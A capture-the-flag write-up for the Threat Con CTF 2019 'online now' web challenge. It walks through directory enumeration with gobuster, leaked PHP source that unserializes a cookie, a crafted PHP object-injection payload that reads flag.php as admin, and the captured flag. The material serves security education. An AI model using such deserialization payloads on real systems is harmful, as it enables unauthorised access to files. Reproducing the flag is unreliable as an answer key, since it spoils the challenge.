Cybertalents – threat con ctf 2019 – online now writeup

threat con ctf 2019

So this one was 200 points hard challenge. I guess only one guy was able to do it. I was a little bit disappointed that I was not able to do it on time. Anyway here is the writeup.

Let us begin with the URL, the URL for the challenge was http://35.224.115.104/onlinenow/ which is as below

online now home page

It just outputs some info about us ie IP address and USER-AGENT

Looking at this page source code reveals a cache file called cache.php

onlinenow source – cache.php

Browsing the URL http://35.224.115.104/onlinenow/libs/cache.php shows a white blank page. Nothing here.

But if we remove cache.php and just browse http://35.224.115.104/onlinenow/libs/, it lists the directory.

directory listing

Cool! from here we can download .src files which are the source code for start.php and cache.php.

After downloading them we can view the source code.

start.php.src

<?php
session_start();
define('InChallenge',true);
if(!isset($_SESSION['user'])){
    $ip = $_SERVER['REMOTE_ADDR'];
    $ua = $_SERVER['HTTP_USER_AGENT'];
    setcookie('user_info',serialize('IP = '.$ip.' , UA = '.$ua),time()+86400,"/");
    $_SESSION['user'] = 'guest';
}else{

    if(isset($_COOKIE['user_info'])){
        $at = $_COOKIE['user_info'];
        $info = unserialize($at);
    }else{
        $info = 'Unknown';
    }
}

cache.php.src

<?php

class SessionClass
{
    public $user = 'guest';

    public function __construct()
    {
        $this->user = (isset($_SESSION['user'])) ? $_SESSION['user'] : 'guest';
    }

    public function getCurrentPageContent($pageName)
    {
        return str_replace(['<?php','//','?>'],'',file_get_contents(__DIR__.'/../cache/'.$this->user.'/'.$pageName.'.php'));
    }
}

class Cache
{
    public $cachedFile = null;
    public $pageName = 'index';

    public function __construct($pageName)
    {
        $this->pageName = $pageName;
        $this->cachedFile = new SessionClass();
    }

    public function __toString()
    {
        //echo $this->pageName;
        if($this->cachedFile)
        {
            return $this->cachedFile->getCurrentPageContent($this->pageName);
        }
        return '';
    }
}

I will discuss the code later. Furthermore, I did run gobuster to see if there are any folders I am missing. I find /cache folder. Later, I ran gobuster again which reveals more folders.

# gobuster -u http://35.224.115.104/onlinenow/cache/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://35.224.115.104/onlinenow/cache/
[+] Threads      : 50
[+] Wordlist     : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/admin (Status: 301)
/guest (Status: 301)

When we visit the folder one by one ie http://35.224.115.104/onlinenow/cache/admin/ and http://35.224.115.104/onlinenow/cache/guest/, it just output greets us as below

Hello Admin
Hello Visitor

That’s all I found about the challenge.

Now, back to code. Looking into the source code, we can say that it is all about PHP Object Injection (Look at Example2). In our case, we need to trick the program by using a COOKIE. I do not want to discuss all the technical part in detail here but what we actually want to do is tell the program that we are user admin and want to view the source code of flag.php file.

I have created a PAYLOAD to send in COOKIE for this to work and disclose the flag. We need to send following in our COOKIE user_info. I have used burp suite to intercept the request and send it.

O:5:"Cache":2:{s:10:"cachedFile";O:12:"SessionClass":1:{s:4:"user";s:5:"admin";}s:8:"pageName";s:4:"flag";}

Here,
O:5 => the character length of the class cache
s:10:”cachedFile” => string, length of “cachedFile”
and so on.

If you like to read more then you can go here.

Now, urlencode the PAYLOAD using ctrl+U and send the GET request to http://35.224.115.104/onlinenow/

request with payload

The response from server will include another COOKIE called PHPSESSID

response with PHPSESSID

Now, copy the PHPSESSID into our COOKIE user_info and send another GET request.

another request

If everything is good then you will see the flag.

cybertalent onlinenow flag

The flag is !amTh3Adm!nFlag$$

Link

Leave a Reply

Your email address will not be published. Required fields are marked *